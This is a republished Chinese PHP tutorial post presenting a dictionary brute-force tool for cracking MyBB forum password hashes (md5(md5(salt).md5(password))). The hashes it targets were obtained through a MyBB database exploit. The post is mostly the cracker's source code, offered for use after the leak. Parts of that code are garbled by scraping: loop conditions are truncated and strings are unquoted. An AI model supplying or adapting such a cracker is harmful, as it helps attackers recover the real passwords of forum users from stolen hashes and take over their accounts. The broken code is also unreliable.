Heim  >  Artikel  >  Backend-Entwicklung  >  MyBB论坛程序密码暴力破解工具PHP版_PHP教程

MyBB论坛程序密码暴力破解工具PHP版_PHP教程

WBOY
WBOYOriginal
2016-07-13 17:34:062679Durchsuche

前两天和消失看的那个myBB论坛的exploit之后,破解出来的密码很变态~是经过md5(md5(salt).md(pass))这种形式的~
一直没有进展~今天编写了一个小的利用程序~希望大家能用得上~
pass.txt为密码字典~~一行一个~

另外,虽然程序中用了很垃圾的英文字符,但是程序绝对原创~

[Copy to clipboard] [ - ]CODE:
/*
MyBB论坛程序密码暴力破解工具PHP版  By Cool_wXd[C.R.S.T]
本程序主要是针对MyBB论坛程序密码加密形式md5(md5(salt).md5(password))
由于网络上针对MyBB的exploit程序只是破解出来数据库中的密码,而没有破解出来真正的密码
也是由于最近遇到这样的问题,所以写出这么一个简单的小程序希望能够有所帮助!
*/
if ($argc{
print "-------------------------------------------------------------- ";
print "           MyBB Password Cracker v1.0 ";
print "-------------------------------------------------------------- ";
print "Usage: mybb_password_cracker.php [md5_hash] [salt] ";
print "-------------------------------------------------------------- ";
print "http://www.wolfexp.net & http://hi.baidu.com/cool_wxd ";
print "             By Cool_wXd[C.R.S.T] ";
print "-------------------------------------------------------------- ";
die;
}
function salt_password($password, $salt)
{
return md5(md5($salt).md5($password));
}
$md5_hash = $argv[1];
$salt = $argv[2];
$dict="pass.txt";//password dictionary
if (strlen($md5_hash)!=32) {echo Error... The md5_hash must be 32 bits; die;}
if(!file_exists($dict)) {echo Can not find the password dictionary;die;}
$dict_pass=file($dict); 
$num=sizeof($dict_pass); 
for($i=0;$i{ 
$now_password=chop($dict_pass[$i]);
if($md5_hash==salt_password($now_password,$salt)) {echo Success!(.$md5_hash.)is cracked and the true password is:(.$now_password.);break;}}
?>
另外,我们测试的那个论坛中我们注册账号的密码破解如图

\

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/508529.htmlTechArticle前两天和消失看的那个myBB论坛的exploit之后,破解出来的密码很变态~是经过md5(md5(salt).md(pass))这种形式的~ 一直没有进展~今天编写了一个小...
Stellungnahme:
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn